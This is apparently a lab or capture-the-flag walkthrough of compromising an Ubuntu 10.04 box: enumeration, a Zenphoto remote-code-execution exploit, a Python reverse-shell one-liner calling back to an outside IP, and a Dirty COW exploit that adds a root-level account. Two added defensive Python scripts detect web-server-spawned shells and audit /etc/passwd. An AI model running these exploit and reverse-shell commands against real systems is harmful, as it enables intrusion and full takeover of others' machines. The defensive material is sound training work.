Overview

Enumeration

Network Scan with Nmap

$ nmap $ip -p22,23,80,3306 -sVC --version-all
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)
|_ 2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)
23/tcp open ipp CUPS 1.4
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.4
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.14 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)

Directory Fuzzing

$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q -x php,html,txt
/index (Status: 200) [Size: 75]
/index.html (Status: 200) [Size: 75]
/index.html (Status: 200) [Size: 75]
/test (Status: 301) [Size: 313] [--> http://192.168.66.41/test/]

The Zenphoto install under the /test/ directory is vulnerable to remote code execution (Exploit-DB).

Initial access

$ php 18083.php $ip /test/
+-----------------------------------------------------------+
| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |
+-----------------------------------------------------------+
zenphoto-shell# whoami
www-data
zenphoto-shell# which python
/usr/bin/python
zenphoto-shell# python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.66",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
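The transcript above shows the web server's account (www-data) launching python, which in turn spawns /bin/sh. From the defender's side that process lineage is the artefact worth alerting on. The Python below is an added example, not part of this write-up: it parses a process snapshot in the column layout of `ps -eo pid,ppid,user,comm,args` (the snapshot itself is constructed to mimic the box, the column layout is an assumption) and flags shells or interpreters running as a web-server account that have a web-server process somewhere in their ancestry.

```python
"""Flag shells and script interpreters spawned under a web-server account.

Added example, not part of the original write-up. The process snapshot
below is constructed; it assumes the column layout of
`ps -eo pid,ppid,user,comm,args` with the header line first.
"""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid user comm args")

# Constructed snapshot: apache2 workers as www-data, one of which has run
# `sh -c python -c ...`, which spawned python, which spawned /bin/sh (the
# lineage produced by the pty.spawn one-liner in the transcript).
SAMPLE_PS = """\
  PID  PPID USER     COMMAND         COMMAND
    1     0 root     init            /sbin/init
  900     1 root     apache2         /usr/sbin/apache2 -k start
  905   900 www-data apache2         /usr/sbin/apache2 -k start
  910   900 www-data apache2         /usr/sbin/apache2 -k start
 1200   905 www-data sh              sh -c python -c 'import socket,os,pty;...'
 1201  1200 www-data python          python -c import socket,os,pty;s=socket.socket(...)
 1202  1201 www-data sh              /bin/sh
 1300     1 root     sshd            /usr/sbin/sshd -D
 1301  1300 root     bash            -bash
"""

WEB_USERS = {"www-data", "apache", "nginx", "httpd"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"sh", "bash", "dash", "zsh"}
INTERPRETERS = {"python", "python2", "python3", "perl", "php", "ruby"}


def parse_ps(text):
    """Parse the snapshot into {pid: Proc}; the header line is skipped."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, ppid, user, comm, args = parts
        procs[int(pid)] = Proc(int(pid), int(ppid), user, comm, args)
    return procs


def ancestors(procs, pid):
    """Yield the parent chain of pid, nearest parent first (cycle-safe)."""
    seen = set()
    cur = procs.get(pid)
    while cur is not None and cur.ppid in procs and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = procs[cur.ppid]
        yield cur


def find_web_shells(procs):
    """Return suspicious processes: a shell or interpreter running as a
    web-server account with a web-server process somewhere above it."""
    hits = []
    for p in sorted(procs.values()):  # namedtuples sort by pid first
        if p.user not in WEB_USERS or p.comm not in SHELLS | INTERPRETERS:
            continue
        chain = list(ancestors(procs, p.pid))
        if any(a.comm in WEB_SERVERS for a in chain):
            hits.append({"pid": p.pid, "user": p.user, "comm": p.comm,
                         "lineage": [a.comm for a in chain]})
    return hits


if __name__ == "__main__":
    for h in find_web_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {h['pid']}: {h['comm']} as {h['user']}, "
              f"ancestry {' <- '.join(h['lineage'])}")
```

Run against a live box, replace SAMPLE_PS with the output of the ps command named in the docstring; the root bash under sshd in the sample is deliberately left unflagged, since the rule keys on both the account and the lineage, not on shells in general.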

Privilege Escalation

Kernel Exploitation

www-data@offsecsrv:/tmp$ uname -a
Linux offsecsrv 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
www-data@offsecsrv:/tmp$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS"

Dirty cow: https://raw.githubusercontent.com/evait-security/ClickNRoot/master/1/exploit.c

www-data@offsecsrv:/tmp$ gcc -pthread ./exploit.c -o dirty -lcrypt
www-data@offsecsrv:/tmp$ ./dirty password
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password
Complete line:
evait:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: b77ef000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username evait and password password.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
www-data@offsecsrv:/tmp$ su evait
Password: madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username evait and password password.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
evait@offsecsrv:/tmp# cd /root
evait@offsecsrv:~# ls
mysqlpass proof.txt
evait@offsecsrv:~# cat proof.txt
3761b3bc60093a037056cd2538b46b31
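The PoC above gains root by writing a new UID-0 account, with its password hash placed directly in /etc/passwd (the evait line), and its own banner says to restore the file from /tmp/passwd.bak afterwards. Those two facts give a defender a concrete integrity check. The Python below is an added example, not from this write-up: it parses passwd(5) entries, flags non-root UID-0 accounts, password hashes or empty passwords stored in the passwd file rather than in shadow, and diffs the file against a baseline copy. The baseline and current contents are constructed for the example; only the evait line is taken from the output above.

```python
"""Audit /etc/passwd for backdoor accounts and diff it against a baseline.

Added example, not part of the original write-up. PASSWD_BACKUP and
PASSWD_CURRENT are constructed sample files; the evait entry is the line
printed by the exploit in the transcript.
"""
import sys

# Constructed baseline, standing in for /tmp/passwd.bak.
PASSWD_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false
"""

# Constructed "after" state: baseline plus the line the PoC added.
PASSWD_CURRENT = PASSWD_BACKUP + "evait:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash\n"

# Values in the password field that mean "look in /etc/shadow" or "locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Return {username: entry} from passwd(5)-formatted text.

    Raises ValueError on a line without exactly seven colon-separated fields,
    since a malformed passwd file is itself worth investigating."""
    entries = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                         "gecos": gecos, "home": home, "shell": shell,
                         "raw": line}
    return entries


def audit_passwd(current_text, baseline_text=None):
    """Return a list of findings as 'kind:username' strings, in file order."""
    findings = []
    current = parse_passwd(current_text)
    for name, e in current.items():
        if e["uid"] == 0 and name != "root":
            findings.append(f"uid0-account:{name}")
        if e["pw"] == "":
            findings.append(f"empty-password:{name}")
        elif e["pw"] not in SHADOWED_OR_LOCKED:
            findings.append(f"hash-in-passwd:{name}")
    if baseline_text is not None:
        baseline = parse_passwd(baseline_text)
        for name in sorted(set(current) - set(baseline)):
            findings.append(f"added:{name}")
        for name in sorted(set(baseline) - set(current)):
            findings.append(f"removed:{name}")
        for name in sorted(set(current) & set(baseline)):
            if current[name]["raw"] != baseline[name]["raw"]:
                findings.append(f"modified:{name}")
    return findings


if __name__ == "__main__":
    # Usage: audit.py [/etc/passwd [/tmp/passwd.bak]]; defaults to the samples.
    if len(sys.argv) >= 2:
        cur = open(sys.argv[1]).read()
        base = open(sys.argv[2]).read() if len(sys.argv) >= 3 else None
    else:
        cur, base = PASSWD_CURRENT, PASSWD_BACKUP
    for f in audit_passwd(cur, base):
        print(f)
```

The hash-in-passwd check matters independently of the UID check: a world-readable /etc/passwd carrying a hash means anyone on the box can run an offline guess against it, which is exactly what the exploit relies on when it lets you `su evait` without touching /etc/shadow.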

The host is also vulnerable to the RDS protocol local privilege escalation (Exploit-DB).